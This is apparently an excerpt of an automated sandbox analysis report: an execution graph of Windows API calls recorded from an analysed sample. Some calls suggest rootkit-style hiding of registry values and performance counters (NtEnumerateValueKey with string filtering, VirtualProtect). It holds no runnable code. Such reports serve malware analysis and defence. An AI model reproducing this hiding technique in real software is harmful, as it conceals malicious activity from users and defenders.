                                                          • API String ID: 3013565938-461861421
                                                          APIs
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ntdll.dll
                                                          • API String ID: 1646373207-2227199552
                                                          APIs
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          APIs
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0

                                                          Execution Graph

                                                          Execution Coverage: 2.7%
                                                          Dynamic/Decrypted Code Coverage: 100%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 1396
                                                          Total number of Limit Nodes: 14
2d0165edb74 __free_lconv_mon 11 API calls 8002->8004 8005 2d0165ef6f7 FreeEnvironmentStringsW 8003->8005 8004->8005 8005->7988 8008 2d0165ec5ad 8007->8008 8009 2d0165edafc __free_lconv_mon 11 API calls 8008->8009 8019 2d0165ec5e3 8009->8019 8010 2d0165edb74 __free_lconv_mon 11 API calls 8011 2d0165ec553 8010->8011 8011->7977 8012 2d0165ec65e 8013 2d0165edb74 __free_lconv_mon 11 API calls 8012->8013 8013->8011 8014 2d0165edafc __free_lconv_mon 11 API calls 8014->8019 8015 2d0165ec64d 8224 2d0165ec698 8015->8224 8019->8012 8019->8014 8019->8015 8020 2d0165ec683 8019->8020 8023 2d0165edb74 __free_lconv_mon 11 API calls 8019->8023 8024 2d0165ec5eb 8019->8024 8215 2d0165ecb18 8019->8215 8022 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 8020->8022 8021 2d0165edb74 __free_lconv_mon 11 API calls 8021->8024 8025 2d0165ec696 8022->8025 8023->8019 8024->8010 8027 2d0165ed33d FlsGetValue 8026->8027 8028 2d0165ed358 FlsSetValue 8026->8028 8029 2d0165ed352 8027->8029 8033 2d0165ed34a 8027->8033 8030 2d0165ed365 8028->8030 8028->8033 8029->8028 8031 2d0165edafc __free_lconv_mon 11 API calls 8030->8031 8032 2d0165ed374 8031->8032 8034 2d0165ed392 FlsSetValue 8032->8034 8035 2d0165ed382 FlsSetValue 8032->8035 8033->7985 8036 2d0165ed39e FlsSetValue 8034->8036 8037 2d0165ed3b0 8034->8037 8038 2d0165ed38b 8035->8038 8036->8038 8039 2d0165ecfc4 __free_lconv_mon 11 API calls 8037->8039 8040 2d0165edb74 __free_lconv_mon 11 API calls 8038->8040 8041 2d0165ed3b8 8039->8041 8040->8033 8041->8033 8042 2d0165edb74 __free_lconv_mon 11 API calls 8041->8042 8042->8033 8066 2d0165ef008 8043->8066 8048 2d0165ece3c 12 API calls 8049 2d0165eedfb 8048->8049 8050 2d0165eee03 8049->8050 8052 2d0165eee12 8049->8052 8051 2d0165edb74 __free_lconv_mon 11 API calls 8050->8051 8065 2d0165eedea 8051->8065 8052->8052 8085 2d0165ef13c 8052->8085 8055 2d0165eef0e 8056 2d0165edadc __free_lconv_mon 11 API calls 8055->8056 8058 2d0165eef13 8056->8058 8057 2d0165eef69 8064 2d0165eefd0 8057->8064 8096 
2d0165ee8c8 8057->8096 8060 2d0165edb74 __free_lconv_mon 11 API calls 8058->8060 8059 2d0165eef28 8059->8057 8061 2d0165edb74 __free_lconv_mon 11 API calls 8059->8061 8060->8065 8061->8057 8063 2d0165edb74 __free_lconv_mon 11 API calls 8063->8065 8064->8063 8065->7983 8067 2d0165ef02b 8066->8067 8071 2d0165ef035 8067->8071 8111 2d0165ecdcc EnterCriticalSection 8067->8111 8073 2d0165eedcd 8071->8073 8075 2d0165ed32c 16 API calls 8071->8075 8078 2d0165eea98 8073->8078 8076 2d0165ef0fc 8075->8076 8077 2d0165eed98 69 API calls 8076->8077 8077->8073 8112 2d0165ee5e4 8078->8112 8081 2d0165eeaca 8083 2d0165eeacf GetACP 8081->8083 8084 2d0165eeadf 8081->8084 8082 2d0165eeab8 GetOEMCP 8082->8084 8083->8084 8084->8048 8084->8065 8086 2d0165eea98 25 API calls 8085->8086 8087 2d0165ef169 8086->8087 8088 2d0165ef2bf 8087->8088 8090 2d0165ef1a6 IsValidCodePage 8087->8090 8095 2d0165ef1c0 _invalid_parameter_noinfo 8087->8095 8089 2d0165e7d70 _log10_special 8 API calls 8088->8089 8092 2d0165eef05 8089->8092 8090->8088 8091 2d0165ef1b7 8090->8091 8093 2d0165ef1e6 GetCPInfo 8091->8093 8091->8095 8092->8055 8092->8059 8093->8088 8093->8095 8128 2d0165eebb0 8095->8128 8214 2d0165ecdcc EnterCriticalSection 8096->8214 8113 2d0165ee608 8112->8113 8114 2d0165ee603 8112->8114 8113->8114 8115 2d0165ed258 _invalid_parameter_noinfo 23 API calls 8113->8115 8114->8081 8114->8082 8116 2d0165ee623 8115->8116 8120 2d0165f082c 8116->8120 8121 2d0165ee646 8120->8121 8122 2d0165f0841 8120->8122 8124 2d0165f0898 8121->8124 8122->8121 8123 2d0165f0e8c _invalid_parameter_noinfo 23 API calls 8122->8123 8123->8121 8125 2d0165f08ad 8124->8125 8126 2d0165f08c0 8124->8126 8125->8126 8127 2d0165ef120 _invalid_parameter_noinfo 23 API calls 8125->8127 8126->8114 8127->8126 8129 2d0165eebed GetCPInfo 8128->8129 8130 2d0165eece3 8128->8130 8129->8130 8136 2d0165eec00 8129->8136 8131 2d0165e7d70 _log10_special 8 API calls 8130->8131 8132 2d0165eed82 8131->8132 8132->8088 8139 2d0165f1974 8136->8139 8140 
2d0165ee5e4 23 API calls 8139->8140 8141 2d0165f19b6 8140->8141 8159 2d0165ef4ac 8141->8159 8161 2d0165ef4b5 MultiByteToWideChar 8159->8161 8216 2d0165ecb25 8215->8216 8218 2d0165ecb2f 8215->8218 8216->8218 8222 2d0165ecb4a 8216->8222 8217 2d0165edadc __free_lconv_mon 11 API calls 8219 2d0165ecb36 8217->8219 8218->8217 8220 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 8219->8220 8221 2d0165ecb42 8220->8221 8221->8019 8222->8221 8223 2d0165edadc __free_lconv_mon 11 API calls 8222->8223 8223->8219 8225 2d0165ec69d 8224->8225 8226 2d0165ec655 8224->8226 8227 2d0165ec6c6 8225->8227 8228 2d0165edb74 __free_lconv_mon 11 API calls 8225->8228 8226->8021 8229 2d0165edb74 __free_lconv_mon 11 API calls 8227->8229 8228->8225 8229->8226 8939 2d0165ed094 8940 2d0165ed099 8939->8940 8941 2d0165ed0ae 8939->8941 8945 2d0165ed0b4 8940->8945 8946 2d0165ed0f6 8945->8946 8947 2d0165ed0fe 8945->8947 8948 2d0165edb74 __free_lconv_mon 11 API calls 8946->8948 8949 2d0165edb74 __free_lconv_mon 11 API calls 8947->8949 8948->8947 8950 2d0165ed10b 8949->8950 8951 2d0165edb74 __free_lconv_mon 11 API calls 8950->8951 8952 2d0165ed118 8951->8952 8953 2d0165edb74 __free_lconv_mon 11 API calls 8952->8953 8954 2d0165ed125 8953->8954 8955 2d0165edb74 __free_lconv_mon 11 API calls 8954->8955 8956 2d0165ed132 8955->8956 8957 2d0165edb74 __free_lconv_mon 11 API calls 8956->8957 8958 2d0165ed13f 8957->8958 8959 2d0165edb74 __free_lconv_mon 11 API calls 8958->8959 8960 2d0165ed14c 8959->8960 8961 2d0165edb74 __free_lconv_mon 11 API calls 8960->8961 8962 2d0165ed159 8961->8962 8963 2d0165edb74 __free_lconv_mon 11 API calls 8962->8963 8964 2d0165ed169 8963->8964 8965 2d0165edb74 __free_lconv_mon 11 API calls 8964->8965 8966 2d0165ed179 8965->8966 8971 2d0165ecf64 8966->8971 8985 2d0165ecdcc EnterCriticalSection 8971->8985 7698 2d0165e2990 NtEnumerateValueKey 7699 2d0165e2a38 7698->7699 7701 2d0165e29dc 7698->7701 7700 2d0165e29ea NtEnumerateValueKey 7700->7701 7701->7699 7701->7700 7703 2d0165e3c74 
7701->7703 7704 2d0165e3c96 7703->7704 7705 2d0165e3c81 StrCmpNIW 7703->7705 7704->7701 7705->7704 8751 2d0165e4010 8752 2d0165e3f5d _invalid_parameter_noinfo 8751->8752 8753 2d0165e3fad VirtualQuery 8752->8753 8754 2d0165e3fc7 8752->8754 8755 2d0165e4012 GetLastError 8752->8755 8753->8752 8753->8754 8755->8752 8755->8754 8756 2d0165f4e10 8757 2d0165f4e48 __GSHandlerCheckCommon 8756->8757 8758 2d0165f4e74 8757->8758 8760 2d0165ea16c 8757->8760 8761 2d0165e9a64 _CreateFrameInfo 9 API calls 8760->8761 8762 2d0165ea196 8761->8762 8763 2d0165e9a64 _CreateFrameInfo 9 API calls 8762->8763 8764 2d0165ea1a3 8763->8764 8765 2d0165e9a64 _CreateFrameInfo 9 API calls 8764->8765 8766 2d0165ea1ac 8765->8766 8766->8758 8987 2d0165f4e90 8997 2d0165e9418 8987->8997 8989 2d0165f4eb8 8991 2d0165e9a64 _CreateFrameInfo 9 API calls 8992 2d0165f4ec8 8991->8992 8993 2d0165e9a64 _CreateFrameInfo 9 API calls 8992->8993 8994 2d0165f4ed1 8993->8994 8995 2d0165ecad8 23 API calls 8994->8995 8996 2d0165f4eda 8995->8996 9000 2d0165e9448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8997->9000 8998 2d0165e9539 8998->8989 8998->8991 8999 2d0165e9504 RtlUnwindEx 8999->9000 9000->8998 9000->8999 9001 2d0165f50cf 9002 2d0165f5152 9001->9002 9003 2d0165f50e7 9001->9003 9003->9002 9004 2d0165e9a64 _CreateFrameInfo 9 API calls 9003->9004 9005 2d0165f5134 9004->9005 9006 2d0165e9a64 _CreateFrameInfo 9 API calls 9005->9006 9007 2d0165f5149 9006->9007 9008 2d0165ecad8 23 API calls 9007->9008 9008->9002 8230 2d0165e7f4c 8231 2d0165e7f70 __scrt_acquire_startup_lock 8230->8231 8232 2d0165ebd15 8231->8232 8233 2d0165ed3d0 __free_lconv_mon 11 API calls 8231->8233 8234 2d0165ebd3e 8233->8234 9009 2d0165edecc 9010 2d0165edef1 9009->9010 9020 2d0165edf08 9009->9020 9011 2d0165edadc __free_lconv_mon 11 API calls 9010->9011 9012 2d0165edef6 9011->9012 9014 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9012->9014 9013 2d0165edfc0 9063 2d0165ec32c 9013->9063 9016 2d0165edf01 
9014->9016 9019 2d0165ee020 9022 2d0165edb74 __free_lconv_mon 11 API calls 9019->9022 9020->9013 9023 2d0165edf55 9020->9023 9025 2d0165edf98 9020->9025 9041 2d0165ee110 9020->9041 9021 2d0165ee0b1 9026 2d0165edb74 __free_lconv_mon 11 API calls 9021->9026 9024 2d0165ee027 9022->9024 9027 2d0165edf78 9023->9027 9031 2d0165edb74 __free_lconv_mon 11 API calls 9023->9031 9024->9027 9032 2d0165edb74 __free_lconv_mon 11 API calls 9024->9032 9025->9027 9033 2d0165edb74 __free_lconv_mon 11 API calls 9025->9033 9029 2d0165ee0bc 9026->9029 9030 2d0165edb74 __free_lconv_mon 11 API calls 9027->9030 9028 2d0165ee052 9028->9021 9028->9028 9038 2d0165ee0f7 9028->9038 9069 2d0165f1380 9028->9069 9034 2d0165ee0d5 9029->9034 9037 2d0165edb74 __free_lconv_mon 11 API calls 9029->9037 9030->9016 9031->9023 9032->9024 9033->9025 9035 2d0165edb74 __free_lconv_mon 11 API calls 9034->9035 9035->9016 9037->9029 9039 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 9038->9039 9040 2d0165ee10c 9039->9040 9042 2d0165ee13e 9041->9042 9042->9042 9043 2d0165edafc __free_lconv_mon 11 API calls 9042->9043 9044 2d0165ee189 9043->9044 9045 2d0165f1380 49 API calls 9044->9045 9046 2d0165ee1bf 9045->9046 9047 2d0165ed9c0 _invalid_parameter_noinfo 17 API calls 9046->9047 9048 2d0165ee293 9047->9048 9049 2d0165ee5e4 23 API calls 9048->9049 9050 2d0165ee376 9049->9050 9078 2d0165ef9d8 9050->9078 9055 2d0165ee43d 9056 2d0165ee5e4 23 API calls 9055->9056 9057 2d0165ee46d 9056->9057 9058 2d0165ef9d8 5 API calls 9057->9058 9059 2d0165ee496 9058->9059 9103 2d0165edd40 9059->9103 9062 2d0165ee110 59 API calls 9064 2d0165ec344 9063->9064 9068 2d0165ec37c 9063->9068 9065 2d0165edafc __free_lconv_mon 11 API calls 9064->9065 9064->9068 9066 2d0165ec372 9065->9066 9067 2d0165edb74 __free_lconv_mon 11 API calls 9066->9067 9067->9068 9068->9019 9068->9028 9074 2d0165f139d 9069->9074 9070 2d0165f13a2 9071 2d0165f13b8 9070->9071 9072 2d0165edadc __free_lconv_mon 11 API calls 9070->9072 9071->9028 9073 2d0165f13ac 
9072->9073 9075 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 9073->9075 9074->9070 9074->9071 9076 2d0165f13ec 9074->9076 9075->9071 9076->9071 9077 2d0165edadc __free_lconv_mon 11 API calls 9076->9077 9077->9073 9079 2d0165ef7c4 5 API calls 9078->9079 9080 2d0165ee3a1 9079->9080 9081 2d0165edbc4 9080->9081 9082 2d0165edbee 9081->9082 9083 2d0165edc12 9081->9083 9087 2d0165edb74 __free_lconv_mon 11 API calls 9082->9087 9088 2d0165edbfd FindFirstFileExW 9082->9088 9084 2d0165edc6c 9083->9084 9085 2d0165edc17 9083->9085 9086 2d0165ef4ac MultiByteToWideChar 9084->9086 9085->9088 9089 2d0165edc2c 9085->9089 9090 2d0165edb74 __free_lconv_mon 11 API calls 9085->9090 9094 2d0165edc88 9086->9094 9087->9088 9088->9055 9091 2d0165ece3c 12 API calls 9089->9091 9090->9089 9091->9088 9092 2d0165edc8f GetLastError 9125 2d0165eda50 9092->9125 9094->9092 9097 2d0165edb74 __free_lconv_mon 11 API calls 9094->9097 9101 2d0165edcbd 9094->9101 9102 2d0165edcca 9094->9102 9095 2d0165ef4ac MultiByteToWideChar 9099 2d0165edd0e 9095->9099 9097->9101 9098 2d0165ece3c 12 API calls 9098->9102 9099->9088 9099->9092 9100 2d0165edadc __free_lconv_mon 11 API calls 9100->9088 9101->9098 9102->9088 9102->9095 9104 2d0165edd8e 9103->9104 9106 2d0165edd6a 9103->9106 9105 2d0165edde8 9104->9105 9107 2d0165edd94 9104->9107 9108 2d0165ef53c WideCharToMultiByte 9105->9108 9109 2d0165edb74 __free_lconv_mon 11 API calls 9106->9109 9111 2d0165edd79 9106->9111 9110 2d0165edda9 9107->9110 9107->9111 9112 2d0165edb74 __free_lconv_mon 11 API calls 9107->9112 9118 2d0165ede0c 9108->9118 9109->9111 9113 2d0165ece3c 12 API calls 9110->9113 9111->9062 9112->9110 9113->9111 9114 2d0165ede13 GetLastError 9116 2d0165eda50 11 API calls 9114->9116 9115 2d0165ede50 9115->9111 9120 2d0165ef53c WideCharToMultiByte 9115->9120 9117 2d0165ede20 9116->9117 9121 2d0165edadc __free_lconv_mon 11 API calls 9117->9121 9118->9114 9118->9115 9119 2d0165ede44 9118->9119 9122 2d0165edb74 __free_lconv_mon 11 API calls 9118->9122 
9123 2d0165ece3c 12 API calls 9119->9123 9124 2d0165ede9c 9120->9124 9121->9111 9122->9119 9123->9115 9124->9111 9124->9114 9126 2d0165ed3d0 __free_lconv_mon 11 API calls 9125->9126 9127 2d0165eda5d __free_lconv_mon 9126->9127 9128 2d0165ed3d0 __free_lconv_mon 11 API calls 9127->9128 9129 2d0165eda7f 9128->9129 9129->9100 7546 2d0165e1ac8 7553 2d0165e1628 GetProcessHeap HeapAlloc 7546->7553 7548 2d0165e1ad7 7549 2d0165e1ade SleepEx 7548->7549 7552 2d0165e1598 StrCmpIW StrCmpW 7548->7552 7604 2d0165e18b4 7548->7604 7550 2d0165e1628 50 API calls 7549->7550 7550->7548 7552->7548 7621 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7553->7621 7555 2d0165e1650 7622 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7555->7622 7557 2d0165e1658 7623 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7557->7623 7559 2d0165e1661 7624 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7559->7624 7561 2d0165e166a 7625 2d0165e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7561->7625 7563 2d0165e1673 7626 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7563->7626 7565 2d0165e167c 7627 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7565->7627 7567 2d0165e1685 7628 2d0165e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7567->7628 7569 2d0165e168e RegOpenKeyExW 7570 2d0165e18a6 7569->7570 7571 2d0165e16c0 RegOpenKeyExW 7569->7571 7570->7548 7572 2d0165e16ff RegOpenKeyExW 7571->7572 7573 2d0165e16e9 7571->7573 7575 2d0165e173a RegOpenKeyExW 7572->7575 7576 2d0165e1723 7572->7576 7635 2d0165e12bc RegQueryInfoKeyW 7573->7635 7577 2d0165e175e 7575->7577 7578 2d0165e1775 RegOpenKeyExW 7575->7578 7629 2d0165e104c RegQueryInfoKeyW 7576->7629 7582 2d0165e12bc 16 API calls 7577->7582 7583 2d0165e1799 7578->7583 7584 2d0165e17b0 RegOpenKeyExW 7578->7584 7585 2d0165e176b RegCloseKey 7582->7585 7586 2d0165e12bc 16 API calls 7583->7586 7587 2d0165e17eb RegOpenKeyExW 7584->7587 7588 2d0165e17d4 7584->7588 
7585->7578 7589 2d0165e17a6 RegCloseKey 7586->7589 7591 2d0165e180f 7587->7591 7592 2d0165e1826 RegOpenKeyExW 7587->7592 7590 2d0165e12bc 16 API calls 7588->7590 7589->7584 7595 2d0165e17e1 RegCloseKey 7590->7595 7596 2d0165e104c 6 API calls 7591->7596 7593 2d0165e184a 7592->7593 7594 2d0165e1861 RegOpenKeyExW 7592->7594 7598 2d0165e104c 6 API calls 7593->7598 7599 2d0165e189c RegCloseKey 7594->7599 7600 2d0165e1885 7594->7600 7595->7587 7597 2d0165e181c RegCloseKey 7596->7597 7597->7592 7601 2d0165e1857 RegCloseKey 7598->7601 7599->7570 7602 2d0165e104c 6 API calls 7600->7602 7601->7594 7603 2d0165e1892 RegCloseKey 7602->7603 7603->7599 7649 2d0165e14a4 7604->7649 7621->7555 7622->7557 7623->7559 7624->7561 7625->7563 7626->7565 7627->7567 7628->7569 7630 2d0165e10bf 7629->7630 7631 2d0165e11b5 RegCloseKey 7629->7631 7630->7631 7632 2d0165e10cf RegEnumValueW 7630->7632 7631->7575 7633 2d0165e1125 7632->7633 7633->7631 7633->7632 7634 2d0165e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7633->7634 7634->7633 7636 2d0165e148a RegCloseKey 7635->7636 7637 2d0165e1327 GetProcessHeap HeapAlloc 7635->7637 7636->7572 7638 2d0165e1476 GetProcessHeap HeapFree 7637->7638 7639 2d0165e1352 RegEnumValueW 7637->7639 7638->7636 7640 2d0165e13a5 7639->7640 7640->7638 7640->7639 7642 2d0165e141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7640->7642 7643 2d0165e13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7640->7643 7644 2d0165e152c 7640->7644 7642->7640 7643->7642 7645 2d0165e157c 7644->7645 7646 2d0165e1546 7644->7646 7645->7640 7646->7645 7647 2d0165e155d StrCmpIW 7646->7647 7648 2d0165e1565 StrCmpW 7646->7648 7647->7646 7648->7646 7650 2d0165e14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7649->7650 7651 2d0165e14c1 GetProcessHeap HeapFree 7649->7651 7651->7650 7651->7651 9130 2d0165f52c9 9131 2d0165e9a64 _CreateFrameInfo 9 API calls 9130->9131 9132 2d0165f52d7 9131->9132 9133 2d0165e9a64 _CreateFrameInfo 9 API calls 9132->9133 9134 2d0165f52e2 9132->9134 
9133->9134 8634 2d0165f41c8 8635 2d0165f41df 8634->8635 8636 2d0165f41d9 CloseHandle 8634->8636 8636->8635 9135 2d0165e28c4 9137 2d0165e290a 9135->9137 9136 2d0165e2970 9137->9136 9138 2d0165e3c74 StrCmpNIW 9137->9138 9138->9137 8767 2d0165eb444 8768 2d0165e9a64 _CreateFrameInfo 9 API calls 8767->8768 8769 2d0165eb479 8768->8769 8770 2d0165e9a64 _CreateFrameInfo 9 API calls 8769->8770 8771 2d0165eb487 __except_validate_context_record 8770->8771 8772 2d0165e9a64 _CreateFrameInfo 9 API calls 8771->8772 8773 2d0165eb4cb 8772->8773 8774 2d0165e9a64 _CreateFrameInfo 9 API calls 8773->8774 8775 2d0165eb4d4 8774->8775 8776 2d0165e9a64 _CreateFrameInfo 9 API calls 8775->8776 8777 2d0165eb4dd 8776->8777 8790 2d0165ea084 8777->8790 8780 2d0165e9a64 _CreateFrameInfo 9 API calls 8781 2d0165eb50d __CxxCallCatchBlock 8780->8781 8782 2d0165ea0c0 __CxxCallCatchBlock 9 API calls 8781->8782 8787 2d0165eb5be 8782->8787 8783 2d0165eb5e7 __CxxCallCatchBlock 8784 2d0165e9a64 _CreateFrameInfo 9 API calls 8783->8784 8785 2d0165eb5fa 8784->8785 8786 2d0165e9a64 _CreateFrameInfo 9 API calls 8785->8786 8789 2d0165eb603 8786->8789 8787->8783 8788 2d0165e9750 __CxxCallCatchBlock 9 API calls 8787->8788 8788->8783 8791 2d0165e9a64 _CreateFrameInfo 9 API calls 8790->8791 8792 2d0165ea095 8791->8792 8793 2d0165e9a64 _CreateFrameInfo 9 API calls 8792->8793 8795 2d0165ea0a0 8792->8795 8793->8795 8794 2d0165e9a64 _CreateFrameInfo 9 API calls 8796 2d0165ea0b1 8794->8796 8795->8794 8796->8780 8796->8781 9139 2d0165e7ec0 9140 2d0165e7ec9 __scrt_acquire_startup_lock 9139->9140 9142 2d0165e7ecd 9140->9142 9143 2d0165ec38c 9140->9143 9144 2d0165ec3ac 9143->9144 9173 2d0165ec3c3 9143->9173 9145 2d0165ec3ca 9144->9145 9146 2d0165ec3b4 9144->9146 9147 2d0165ef0c0 69 API calls 9145->9147 9148 2d0165edadc __free_lconv_mon 11 API calls 9146->9148 9149 2d0165ec3cf 9147->9149 9150 2d0165ec3b9 9148->9150 9174 2d0165ee7a4 GetModuleFileNameW 9149->9174 9151 2d0165ed9a0 _invalid_parameter_noinfo 49 API calls 
9150->9151 9151->9173 9156 2d0165ec32c 11 API calls 9157 2d0165ec439 9156->9157 9158 2d0165ec459 9157->9158 9159 2d0165ec441 9157->9159 9160 2d0165ec164 23 API calls 9158->9160 9161 2d0165edadc __free_lconv_mon 11 API calls 9159->9161 9166 2d0165ec475 9160->9166 9162 2d0165ec446 9161->9162 9163 2d0165edb74 __free_lconv_mon 11 API calls 9162->9163 9163->9173 9164 2d0165ec47b 9165 2d0165edb74 __free_lconv_mon 11 API calls 9164->9165 9165->9173 9166->9164 9167 2d0165ec4a7 9166->9167 9168 2d0165ec4c0 9166->9168 9169 2d0165edb74 __free_lconv_mon 11 API calls 9167->9169 9170 2d0165edb74 __free_lconv_mon 11 API calls 9168->9170 9171 2d0165ec4b0 9169->9171 9170->9164 9172 2d0165edb74 __free_lconv_mon 11 API calls 9171->9172 9172->9173 9173->9142 9175 2d0165ee7fd 9174->9175 9176 2d0165ee7e9 GetLastError 9174->9176 9178 2d0165ee5e4 23 API calls 9175->9178 9177 2d0165eda50 11 API calls 9176->9177 9185 2d0165ee7f6 9177->9185 9179 2d0165ee82b 9178->9179 9180 2d0165ef9d8 5 API calls 9179->9180 9182 2d0165ee83c 9179->9182 9180->9182 9181 2d0165e7d70 _log10_special 8 API calls 9184 2d0165ec3e6 9181->9184 9192 2d0165ee688 9182->9192 9186 2d0165ec164 9184->9186 9185->9181 9188 2d0165ec1a2 9186->9188 9190 2d0165ec20e 9188->9190 9206 2d0165ef470 9188->9206 9189 2d0165ec2ff 9189->9156 9190->9189 9191 2d0165ef470 23 API calls 9190->9191 9191->9190 9193 2d0165ee6c7 9192->9193 9199 2d0165ee6ac 9192->9199 9194 2d0165ee6cc 9193->9194 9195 2d0165ef53c WideCharToMultiByte 9193->9195 9198 2d0165edadc __free_lconv_mon 11 API calls 9194->9198 9194->9199 9196 2d0165ee723 9195->9196 9196->9194 9197 2d0165ee72a GetLastError 9196->9197 9201 2d0165ee755 9196->9201 9200 2d0165eda50 11 API calls 9197->9200 9198->9199 9199->9185 9202 2d0165ee737 9200->9202 9203 2d0165ef53c WideCharToMultiByte 9201->9203 9204 2d0165edadc __free_lconv_mon 11 API calls 9202->9204 9205 2d0165ee77c 9203->9205 9204->9199 9205->9197 9205->9199 9207 2d0165ef3fc 9206->9207 9208 2d0165ee5e4 23 API calls 9207->9208 9209 
2d0165ef420 9208->9209 9209->9188 8235 2d0165eb53e 8248 2d0165e9a64 8235->8248 8237 2d0165eb58f RaiseException 8239 2d0165eb5b6 8237->8239 8238 2d0165eb54b __CxxCallCatchBlock 8238->8237 8251 2d0165ea0c0 8239->8251 8241 2d0165eb5e7 __CxxCallCatchBlock 8242 2d0165e9a64 _CreateFrameInfo 9 API calls 8241->8242 8243 2d0165eb5fa 8242->8243 8244 2d0165e9a64 _CreateFrameInfo 9 API calls 8243->8244 8247 2d0165eb603 8244->8247 8262 2d0165e9a80 8248->8262 8250 2d0165e9a6d 8250->8238 8252 2d0165e9a64 _CreateFrameInfo 9 API calls 8251->8252 8253 2d0165ea0d2 8252->8253 8254 2d0165ea10d 8253->8254 8255 2d0165e9a64 _CreateFrameInfo 9 API calls 8253->8255 8256 2d0165ea0dd 8255->8256 8256->8254 8257 2d0165e9a64 _CreateFrameInfo 9 API calls 8256->8257 8258 2d0165ea0fe 8257->8258 8258->8241 8259 2d0165e9750 8258->8259 8260 2d0165e9a64 _CreateFrameInfo 9 API calls 8259->8260 8261 2d0165e975e 8260->8261 8261->8241 8263 2d0165e9a9f GetLastError 8262->8263 8264 2d0165e9a98 8262->8264 8274 2d0165ea3d4 8263->8274 8264->8250 8278 2d0165ea1f4 8274->8278 8279 2d0165ea30e TlsGetValue 8278->8279 8285 2d0165ea238 __vcrt_InitializeCriticalSectionEx 8278->8285 8280 2d0165ea266 LoadLibraryExW 8282 2d0165ea2dd 8280->8282 8283 2d0165ea287 GetLastError 8280->8283 8281 2d0165ea2fd GetProcAddress 8281->8279 8282->8281 8284 2d0165ea2f4 FreeLibrary 8282->8284 8283->8285 8284->8281 8285->8279 8285->8280 8285->8281 8286 2d0165ea2a9 LoadLibraryExW 8285->8286 8286->8282 8286->8285 9210 2d0165e30bc 9211 2d0165e30ec 9210->9211 9212 2d0165e31a5 9211->9212 9213 2d0165e3109 PdhGetCounterInfoW 9211->9213 9213->9212 9214 2d0165e3127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9213->9214 9215 2d0165e3159 StrCmpW 9214->9215 9216 2d0165e3191 GetProcessHeap HeapFree 9214->9216 9215->9216 9218 2d0165e316e 9215->9218 9216->9212 9217 2d0165e3554 12 API calls 9217->9218 9218->9216 9218->9217 9219 2d0165e5cbc 9220 2d0165e5cc3 9219->9220 9221 2d0165e5cf0 VirtualProtect 9220->9221 9223 2d0165e5c00 9220->9223 9222 2d0165e5d19 
GetLastError 9221->9222 9221->9223 9222->9223 8637 2d0165ec9bc 8638 2d0165ec9d5 8637->8638 8639 2d0165ec9ed 8637->8639 8638->8639 8640 2d0165edb74 __free_lconv_mon 11 API calls 8638->8640 8640->8639 9224 2d0165efebc 9225 2d0165efec8 9224->9225 9227 2d0165efeef 9225->9227 9228 2d0165f20ec 9225->9228 9229 2d0165f212c 9228->9229 9230 2d0165f20f1 9228->9230 9229->9225 9231 2d0165f2124 9230->9231 9232 2d0165f2112 DeleteCriticalSection 9230->9232 9233 2d0165edb74 __free_lconv_mon 11 API calls 9231->9233 9232->9231 9232->9232 9233->9229 8641 2d0165f07b8 8642 2d0165f07c3 8641->8642 8650 2d0165f30b8 8642->8650 8663 2d0165ecdcc EnterCriticalSection 8650->8663 8287 2d0165e2334 GetProcessIdOfThread GetCurrentProcessId 8288 2d0165e235f CreateFileW 8287->8288 8289 2d0165e23da 8287->8289 8288->8289 8290 2d0165e2393 WriteFile ReadFile CloseHandle 8288->8290 8290->8289 9234 2d0165f52b3 9237 2d0165e97a4 9234->9237 9238 2d0165e97ce 9237->9238 9239 2d0165e97bc 9237->9239 9241 2d0165e9a64 _CreateFrameInfo 9 API calls 9238->9241 9239->9238 9240 2d0165e97c4 9239->9240 9242 2d0165e97cc 9240->9242 9244 2d0165e9a64 _CreateFrameInfo 9 API calls 9240->9244 9243 2d0165e97d3 9241->9243 9243->9242 9246 2d0165e9a64 _CreateFrameInfo 9 API calls 9243->9246 9245 2d0165e97f3 9244->9245 9247 2d0165e9a64 _CreateFrameInfo 9 API calls 9245->9247 9246->9242 9248 2d0165e9800 9247->9248 9249 2d0165ecad8 23 API calls 9248->9249 9250 2d0165e9809 9249->9250 9251 2d0165ecad8 23 API calls 9250->9251 9252 2d0165e9815 9251->9252 8664 2d0165e2b68 8666 2d0165e2bc5 8664->8666 8665 2d0165e2be0 8666->8665 8667 2d0165e34ac 3 API calls 8666->8667 8667->8665 7652 2d0165e3ee9 7655 2d0165e3e36 _invalid_parameter_noinfo 7652->7655 7653 2d0165e3ea0 7654 2d0165e3e86 VirtualQuery 7654->7653 7654->7655 7655->7653 7655->7654 7656 2d0165e3eba VirtualAlloc 7655->7656 7656->7653 7657 2d0165e3eeb GetLastError 7656->7657 7657->7655 8291 2d0165e5ce9 8292 2d0165e5cf0 VirtualProtect 8291->8292 8293 2d0165e5d19 GetLastError 8292->8293 
